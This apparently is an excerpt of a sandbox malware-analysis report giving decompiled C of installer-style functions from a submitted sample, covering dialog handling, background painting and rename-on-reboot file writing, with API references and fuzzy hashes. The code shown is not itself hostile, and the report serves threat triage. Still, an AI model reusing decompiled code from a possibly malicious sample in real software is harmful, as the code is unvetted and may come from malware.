							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420480 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fc70 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403F3A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004042EB();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E0040402C;
				E00403F18(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

















                                                                                                                0x00404070
                                                                                                                0x00404196
                                                                                                                0x004041f2
                                                                                                                0x004041f6
                                                                                                                0x004042cd
                                                                                                                0x004042cf
                                                                                                                0x004042cf
                                                                                                                0x004042d5
                                                                                                                0x004042d5
                                                                                                                0x004042d8
                                                                                                                0x00000000
                                                                                                                0x004042df
                                                                                                                0x00404204
                                                                                                                0x00404206
                                                                                                                0x00404210
                                                                                                                0x0040421b
                                                                                                                0x0040421e
                                                                                                                0x00404221
                                                                                                                0x0040422c
                                                                                                                0x0040422f
                                                                                                                0x00404236
                                                                                                                0x00404244
                                                                                                                0x0040425c
                                                                                                                0x00404264
                                                                                                                0x0040426f
                                                                                                                0x0040427f
                                                                                                                0x00404281
                                                                                                                0x00404281
                                                                                                                0x00404236
                                                                                                                0x0040428b
                                                                                                                0x00000000
                                                                                                                0x00404296
                                                                                                                0x0040429a
                                                                                                                0x004042ab
                                                                                                                0x004042ab
                                                                                                                0x004042b1
                                                                                                                0x004042bf
                                                                                                                0x004042bf
                                                                                                                0x00000000
                                                                                                                0x004042c3
                                                                                                                0x0040428b
                                                                                                                0x004041a1
                                                                                                                0x00000000
                                                                                                                0x004041b5
                                                                                                                0x004041bb
                                                                                                                0x004041c1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004041e6
                                                                                                                0x004041e8
                                                                                                                0x004041ed
                                                                                                                0x00000000
                                                                                                                0x004041ed
                                                                                                                0x004041a1
                                                                                                                0x00404076
                                                                                                                0x00404079
                                                                                                                0x0040407e
                                                                                                                0x0040408f
                                                                                                                0x0040408f
                                                                                                                0x00404096
                                                                                                                0x00404099
                                                                                                                0x0040409b
                                                                                                                0x004040a0
                                                                                                                0x004040a9
                                                                                                                0x004040af
                                                                                                                0x004040bb
                                                                                                                0x004040be
                                                                                                                0x004040c7
                                                                                                                0x004040cc
                                                                                                                0x004040cf
                                                                                                                0x004040d4
                                                                                                                0x004040eb
                                                                                                                0x004040f2
                                                                                                                0x00404105
                                                                                                                0x00404108
                                                                                                                0x0040411d
                                                                                                                0x00404124
                                                                                                                0x00404129
                                                                                                                0x0040412e
                                                                                                                0x0040412e
                                                                                                                0x0040413d
                                                                                                                0x0040414c
                                                                                                                0x0040414e
                                                                                                                0x00404164
                                                                                                                0x00404173
                                                                                                                0x00404175
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • CheckDlgButton.USER32 ref: 004040EB
                                                                                                                • GetDlgItem.USER32 ref: 004040FF
                                                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                                • GetSysColor.USER32(?), ref: 0040412E
                                                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                                • lstrlenA.KERNEL32(?), ref: 00404156
                                                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                                • GetDlgItem.USER32 ref: 004041D6
                                                                                                                • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                                • GetDlgItem.USER32 ref: 00404204
                                                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                                • LoadCursorA.USER32 ref: 00404253
                                                                                                                • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                                • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                                • LoadCursorA.USER32 ref: 0040427C
                                                                                                                • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                                • String ID: @.B$N$open
                                                                                                                • API String ID: 3615053054-3815657624
                                                                                                                • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                                • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                                • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                                0x0040100a
                                                                                                                0x00401039
                                                                                                                0x00401047
                                                                                                                0x0040104d
                                                                                                                0x00401051
                                                                                                                0x0040105b
                                                                                                                0x00401061
                                                                                                                0x00401064
                                                                                                                0x004010f3
                                                                                                                0x00401089
                                                                                                                0x0040108c
                                                                                                                0x004010a6
                                                                                                                0x004010bd
                                                                                                                0x004010cc
                                                                                                                0x004010cf
                                                                                                                0x004010d5
                                                                                                                0x004010d9
                                                                                                                0x004010e4
                                                                                                                0x004010ed
                                                                                                                0x004010ef
                                                                                                                0x004010ef
                                                                                                                0x00401100
                                                                                                                0x00401105
                                                                                                                0x0040110d
                                                                                                                0x00401110
                                                                                                                0x00401112
                                                                                                                0x00401118
                                                                                                                0x0040111f
                                                                                                                0x00401126
                                                                                                                0x00401130
                                                                                                                0x00401142
                                                                                                                0x00401156
                                                                                                                0x00401160
                                                                                                                0x00401165
                                                                                                                0x00401165
                                                                                                                0x00401110
                                                                                                                0x0040116e
                                                                                                                0x00000000
                                                                                                                0x00401178
                                                                                                                0x00401010
                                                                                                                0x00401013
                                                                                                                0x00401015
                                                                                                                0x0040101f
                                                                                                                0x0040101f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                • GetClientRect.USER32 ref: 0040105B
                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                • FillRect.USER32 ref: 004010E4
                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                • String ID: F
                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                                • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                                • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                                0x004058ba
                                                                                                                0x004058c1
                                                                                                                0x004058c5
                                                                                                                0x004058ce
                                                                                                                0x004058d2
                                                                                                                0x00405a11
                                                                                                                0x00405a11
                                                                                                                0x00000000
                                                                                                                0x00405a11
                                                                                                                0x004058d2
                                                                                                                0x004058de
                                                                                                                0x004058f4
                                                                                                                0x0040591c
                                                                                                                0x00405927
                                                                                                                0x0040592b
                                                                                                                0x0040594b
                                                                                                                0x00405952
                                                                                                                0x0040595c
                                                                                                                0x00405969
                                                                                                                0x0040596e
                                                                                                                0x00405973
                                                                                                                0x00405977
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405986
                                                                                                                0x00405988
                                                                                                                0x00405995
                                                                                                                0x00405999
                                                                                                                0x00405a0a
                                                                                                                0x00405a0b
                                                                                                                0x00000000
                                                                                                                0x004059b5
                                                                                                                0x004059c2
                                                                                                                0x00405a27
                                                                                                                0x00405a2e
                                                                                                                0x004059d5
                                                                                                                0x004059d5
                                                                                                                0x004059d7
                                                                                                                0x004059e0
                                                                                                                0x004059eb
                                                                                                                0x004059fd
                                                                                                                0x00405a04
                                                                                                                0x00000000
                                                                                                                0x00405a04
                                                                                                                0x00405a30
                                                                                                                0x00405a31
                                                                                                                0x00405a36
                                                                                                                0x00405a38
                                                                                                                0x00405a45
                                                                                                                0x00405a45
                                                                                                                0x00405a49
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a3a
                                                                                                                0x00405a3a
                                                                                                                0x00405a3d
                                                                                                                0x00405a40
                                                                                                                0x00405a41
                                                                                                                0x00000000
                                                                                                                0x00405a3a
                                                                                                                0x004059cd
                                                                                                                0x004059d2
                                                                                                                0x00000000
                                                                                                                0x004059d2
                                                                                                                0x00405999
                                                                                                                0x004058f6
                                                                                                                0x00405901
                                                                                                                0x0040590a
                                                                                                                0x0040590e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040590e
                                                                                                                0x00405a1b

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                                  • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                                  • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                                • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                                • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                                • wsprintfA.USER32 ref: 00405945
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                                • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                                  • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                                  • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                • String ID: %s=%s$0&B$[Rename]
                                                                                                                • API String ID: 3772915668-951905037
                                                                                                                • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                                • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                                • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                                • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 737524D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E737524D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E73751215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M73752626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x7375307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x7375309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E73751429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x7375405c);
								goto L17;
							case 4:
								__ecx =  *0x7375405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x7375405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x7375405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x73754000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E737512D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E73751266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                                                0x737524e4
                                                                                                                0x737524e6
                                                                                                                0x737524f0
                                                                                                                0x737524f6
                                                                                                                0x73752500
                                                                                                                0x73752504
                                                                                                                0x73752509
                                                                                                                0x73752509
                                                                                                                0x73752511
                                                                                                                0x73752518
                                                                                                                0x7375251e
                                                                                                                0x00000000
                                                                                                                0x73752525
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375252c
                                                                                                                0x73752530
                                                                                                                0x73752533
                                                                                                                0x73752537
                                                                                                                0x7375253e
                                                                                                                0x73752542
                                                                                                                0x73752548
                                                                                                                0x7375254a
                                                                                                                0x7375254c
                                                                                                                0x7375254c
                                                                                                                0x73752553
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375255c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375256c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752598
                                                                                                                0x737525a0
                                                                                                                0x737525aa
                                                                                                                0x737525ac
                                                                                                                0x737525b1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73752574
                                                                                                                0x73752578
                                                                                                                0x7375257a
                                                                                                                0x7375257b
                                                                                                                0x7375257d
                                                                                                                0x7375258d
                                                                                                                0x73752594
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737525b7
                                                                                                                0x737525b9
                                                                                                                0x737525bf
                                                                                                                0x737525c5
                                                                                                                0x737525c5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375251e
                                                                                                                0x737525c8
                                                                                                                0x737525c8
                                                                                                                0x737525cd
                                                                                                                0x737525de
                                                                                                                0x737525de
                                                                                                                0x737525e4
                                                                                                                0x737525e9
                                                                                                                0x737525ee
                                                                                                                0x737525fa
                                                                                                                0x737525ff
                                                                                                                0x00000000
                                                                                                                0x73752604
                                                                                                                0x737525f0
                                                                                                                0x737525f1
                                                                                                                0x73752605
                                                                                                                0x73752605
                                                                                                                0x737525ee
                                                                                                                0x73752606
                                                                                                                0x7375260a
                                                                                                                0x7375260d
                                                                                                                0x73752625

                                                                                                                APIs
                                                                                                                  • Part of subcall function 73751215: GlobalAlloc.KERNELBASE(00000040,73751233,?,737512CF,-7375404B,737511AB,-000000A0), ref: 7375121D
                                                                                                                • GlobalFree.KERNEL32 ref: 737525DE
                                                                                                                • GlobalFree.KERNEL32 ref: 73752618
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID: {t@ut
                                                                                                                • API String ID: 1780285237-3262140062
                                                                                                                • Opcode ID: c586002a2bf1a82194d35a60e67e78681772914a3849d57eb7c8971a03d27bce
                                                                                                                • Instruction ID: 5b5ae61f6aa46f5e07942084b7e3a1974dd2f23182abd7b633b0ad4f2aa069e6
                                                                                                                • Opcode Fuzzy Hash: c586002a2bf1a82194d35a60e67e78681772914a3849d57eb7c8971a03d27bce
                                                                                                                • Instruction Fuzzy Hash: 28411073204209EFE70E9F54CC98F2A77BAEB85310B2445ADF54AD7160DB359904DB71
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 737522F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E737522F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
